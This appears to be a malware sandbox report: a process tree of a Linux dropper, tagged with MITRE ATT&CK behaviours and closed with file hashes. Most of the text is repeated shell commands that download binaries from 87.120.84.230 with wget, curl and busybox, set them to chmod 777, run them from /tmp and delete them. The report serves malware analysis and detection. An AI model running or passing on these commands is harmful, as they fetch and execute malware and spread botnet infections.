/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1669
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:1672
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1675
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:1678
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1679
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Writes file to tmp directory
PID:1680
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1681
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:1682
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:1683
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:1684
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1685
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Writes file to tmp directory
PID:1686
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1687
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:1688
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:1689
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:1690
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1691
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Writes file to tmp directory
PID:1692
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1693
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:1694
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:1695
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:1696
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1697
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Writes file to tmp directory
PID:1698
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1699
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:1700
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:1701
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:1702
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97